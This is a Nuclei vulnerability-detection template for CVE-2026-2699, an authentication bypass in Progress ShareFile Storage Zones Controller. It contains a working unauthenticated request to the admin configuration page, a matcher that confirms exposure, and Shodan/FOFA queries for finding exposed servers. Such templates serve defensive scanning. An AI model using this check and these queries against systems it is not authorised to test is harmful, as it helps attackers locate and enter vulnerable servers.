id: CVE-2026-2699

info:
  name: Progress ShareFile Storage Zones Controller - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    Customer Managed ShareFile Storage Zones Controller (SZC) contains an authentication bypass (Execution After Redirect) that allows unauthenticated attackers to access restricted configuration pages. This leads to changing system configuration and potential remote code execution.
  impact: |
    Unauthenticated attackers can change system configuration and potentially execute remote code, leading to full system compromise.
  remediation: Update ShareFile Storage Zones Controller to version 5.12.4 or later.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-Progress-ShareFile-CVE-2026-2699
    - https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/
    - https://docs.sharefile.com/en-us/storage-zones-controller/5-0/security-vulnerability-feb26
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-2699
    cwe-id: CWE-284
    epss-score: 0.31163
    epss-percentile: 0.9685
  metadata:
    verified: true
    max-request: 1
    vendor: progress
    product: sharefile_storage_zones_controller
    fofa-query: title=="ShareFile Storage Server"
    shodan-query: title:"ShareFile Storage Server"
  tags: cve,cve2026,progress,sharefile,auth-bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - "ShareFile Storage Server"
        internal: true

  - raw:
      - |
        GET /ConfigService/Admin.aspx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'content_length >= 10000'
        condition: and
# digest: 4a0a00473045022100fcf95cc7b524dfaf726a95ed8bbe3993ab3c5a721079cc12a3f556872a7178b402206ff686dc340e2090887aa9b4f0578774a95b9fcfca7569dfe218c144eee8dd07:922c64590222798bb761d5b6d8e72950